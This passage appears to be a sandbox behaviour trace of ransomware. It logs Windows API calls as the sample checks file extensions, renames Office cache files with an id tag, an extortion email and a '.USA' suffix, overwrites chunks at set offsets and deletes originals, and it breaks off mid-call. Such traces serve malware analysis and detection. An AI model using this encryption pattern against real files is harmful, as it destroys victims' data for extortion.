lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0051.015] lstrlenW (lpString=".rar") returned 4 [0051.015] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0051.015] lstrlenW (lpString=".bz2") returned 4 [0051.015] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0051.015] lstrlenW (lpString=".7z") returned 3 [0051.015] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0051.015] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.016] lstrlenW (lpString=".dbf") returned 4 [0051.016] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0051.016] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.016] lstrlenW (lpString=".1cd") returned 4 [0051.016] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0051.016] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.016] lstrlenW (lpString=".jpg") returned 4 [0051.016] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0051.016] lstrcmpiW (lpString1=".cab", lpString2=".USA") returned -1 [0051.016] lstrlenW (lpString="PrjPrrWW.cab") returned 12 [0051.016] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0051.732] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=162970271) returned 1 [0051.732] CloseHandle (hObject=0x1d0) returned 1 [0051.732] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab")) returned 0x2020 [0051.732] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0051.732] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0051.733] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0051.733] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc6c | out: lpNewFilePointer=0x0) returned 1 [0051.733] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.733] ReadFile (in: hFile=0x1d0, lpBuffer=0x3ab0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ab0058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.739] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x33ce8df, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.739] ReadFile (in: hFile=0x1d0, lpBuffer=0x3af0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3af0058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.744] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x306fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0051.744] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x9b2ba9f, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.744] ReadFile (in: hFile=0x1d0, lpBuffer=0x3b30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b30058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.758] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.758] WriteFile (in: hFile=0x1d0, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x306fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0051.775] SetEndOfFile (hFile=0x1d0) returned 1 [0051.778] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3f10058 [0051.816] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0051.816] WriteFile (in: hFile=0x1d0, lpBuffer=0x3f10058*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f10058*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0051.817] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x33ce8df, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0051.817] WriteFile (in: hFile=0x1d0, lpBuffer=0x3f10058*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f10058*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0051.820] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x9b2ba9f, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0051.820] WriteFile (in: hFile=0x1d0, lpBuffer=0x3f10058*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f10058*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0051.841] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3f10058 | out: hHeap=0x5d0000) returned 1 [0051.841] CloseHandle (hObject=0x1d0) returned 1 [0051.841] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0051.841] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.841] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.841] lstrlenW (lpString=".doc") returned 4 [0051.842] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0051.842] lstrlenW (lpString=".docx") returned 5 [0051.842] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0051.842] lstrlenW (lpString=".pdf") returned 4 [0051.842] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0051.842] lstrlenW (lpString=".xls") returned 4 [0051.842] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0051.842] lstrlenW (lpString=".xlsx") returned 5 [0051.842] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0051.842] lstrlenW (lpString=".ppt") returned 4 [0051.842] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0051.842] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.842] lstrlenW (lpString=".zip") returned 4 [0051.842] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0051.842] lstrlenW (lpString=".rar") returned 4 [0051.842] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0051.842] lstrlenW (lpString=".bz2") returned 4 [0051.842] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0051.842] lstrlenW (lpString=".7z") returned 3 [0051.842] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0051.842] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.842] lstrlenW (lpString=".dbf") returned 4 [0051.842] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0051.842] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.842] lstrlenW (lpString=".1cd") returned 4 [0051.842] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0051.842] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.842] lstrlenW (lpString=".jpg") returned 4 [0051.842] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0051.842] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.842] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.842] lstrlenW (lpString=".doc") returned 4 [0051.843] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0051.843] lstrlenW (lpString=".docx") returned 5 [0051.843] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0051.843] lstrlenW (lpString=".pdf") returned 4 [0051.843] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0051.843] lstrlenW (lpString=".xls") returned 4 [0051.843] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0051.843] lstrlenW (lpString=".xlsx") returned 5 [0051.843] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0051.843] lstrlenW (lpString=".ppt") returned 4 [0051.843] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0051.843] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.843] lstrlenW (lpString=".zip") returned 4 [0051.843] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0051.843] lstrlenW (lpString=".rar") returned 4 [0051.843] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0051.843] lstrlenW (lpString=".bz2") returned 4 [0051.843] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0051.843] lstrlenW (lpString=".7z") returned 3 [0051.843] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0051.843] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.843] lstrlenW (lpString=".dbf") returned 4 [0051.843] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0051.843] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.843] lstrlenW (lpString=".1cd") returned 4 [0051.843] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0051.843] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0051.843] lstrlenW (lpString=".jpg") returned 4 [0051.843] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0051.844] lstrcmpiW (lpString1=".exe", lpString2=".USA") returned -1 [0051.844] lstrlenW (lpString="setup.exe") returned 9 [0051.844] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0051.844] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=1377656) returned 1 [0051.844] CloseHandle (hObject=0x1d0) returned 1 [0051.844] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 0x2020 [0051.844] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0051.844] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0051.844] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.844] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.844] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0051.845] GetLastError () returned 0x0 [0051.845] ReadFile (in: hFile=0x1d0, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0051.866] WriteFile (in: hFile=0x1c4, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0052.105] ReadFile (in: hFile=0x1d0, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x50588, lpOverlapped=0x0) returned 1 [0052.127] WriteFile (in: hFile=0x1c4, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0x50590, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0x50590, lpOverlapped=0x0) returned 1 [0052.268] ReadFile (in: hFile=0x1d0, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.268] WriteFile (in: hFile=0x1c4, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0052.268] SetEndOfFile (hFile=0x1c4) returned 1 [0052.268] CloseHandle (hObject=0x1c4) returned 1 [0052.268] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.268] SetEndOfFile (hFile=0x1d0) returned 1 [0052.272] CloseHandle (hObject=0x1d0) returned 1 [0052.272] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0052.272] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 1 [0052.272] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.272] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.272] lstrlenW (lpString=".doc") returned 4 [0052.272] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0052.272] lstrlenW (lpString=".docx") returned 5 [0052.272] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0052.272] lstrlenW (lpString=".pdf") returned 4 [0052.272] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0052.272] lstrlenW (lpString=".xls") returned 4 [0052.272] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0052.272] lstrlenW (lpString=".xlsx") returned 5 [0052.272] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0052.272] lstrlenW (lpString=".ppt") returned 4 [0052.272] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0052.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.273] lstrlenW (lpString=".zip") returned 4 [0052.273] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0052.273] lstrlenW (lpString=".rar") returned 4 [0052.273] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0052.273] lstrlenW (lpString=".bz2") returned 4 [0052.273] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0052.273] lstrlenW (lpString=".7z") returned 3 [0052.273] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0052.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.273] lstrlenW (lpString=".dbf") returned 4 [0052.273] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0052.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.273] lstrlenW (lpString=".1cd") returned 4 [0052.273] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0052.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.273] lstrlenW (lpString=".jpg") returned 4 [0052.273] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0052.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.273] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.273] lstrlenW (lpString=".doc") returned 4 [0052.273] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0052.273] lstrlenW (lpString=".docx") returned 5 [0052.273] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0052.273] lstrlenW (lpString=".pdf") returned 4 [0052.273] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0052.273] lstrlenW (lpString=".xls") returned 4 [0052.273] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0052.273] lstrlenW (lpString=".xlsx") returned 5 [0052.273] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0052.274] lstrlenW (lpString=".ppt") returned 4 [0052.274] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0052.274] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.274] lstrlenW (lpString=".zip") returned 4 [0052.274] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0052.274] lstrlenW (lpString=".rar") returned 4 [0052.274] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0052.274] lstrlenW (lpString=".bz2") returned 4 [0052.274] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0052.274] lstrlenW (lpString=".7z") returned 3 [0052.274] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0052.274] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.274] lstrlenW (lpString=".dbf") returned 4 [0052.274] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0052.274] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.274] lstrlenW (lpString=".1cd") returned 4 [0052.274] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0052.274] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.274] lstrlenW (lpString=".jpg") returned 4 [0052.274] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0052.274] lstrcmpiW (lpString1=".cab", lpString2=".USA") returned -1 [0052.274] lstrlenW (lpString="OWOW32WW.cab") returned 12 [0052.274] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0052.482] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=36233052) returned 1 [0052.482] CloseHandle (hObject=0x174) returned 1 [0052.483] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab")) returned 0x2020 [0052.483] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0052.483] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0052.483] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0052.483] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc6c | out: lpNewFilePointer=0x0) returned 1 [0052.483] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0052.483] ReadFile (in: hFile=0x174, lpBuffer=0x3ab0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ab0058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.689] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0052.689] ReadFile (in: hFile=0x174, lpBuffer=0x3af0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3af0058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.692] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x306fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0052.692] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0052.692] ReadFile (in: hFile=0x174, lpBuffer=0x3b30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b30058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.707] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.707] WriteFile (in: hFile=0x174, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x306fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0052.724] SetEndOfFile (hFile=0x174) returned 1 [0053.518] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x40170e8 [0053.522] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0053.522] WriteFile (in: hFile=0x174, lpBuffer=0x40170e8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x40170e8*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0053.523] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: 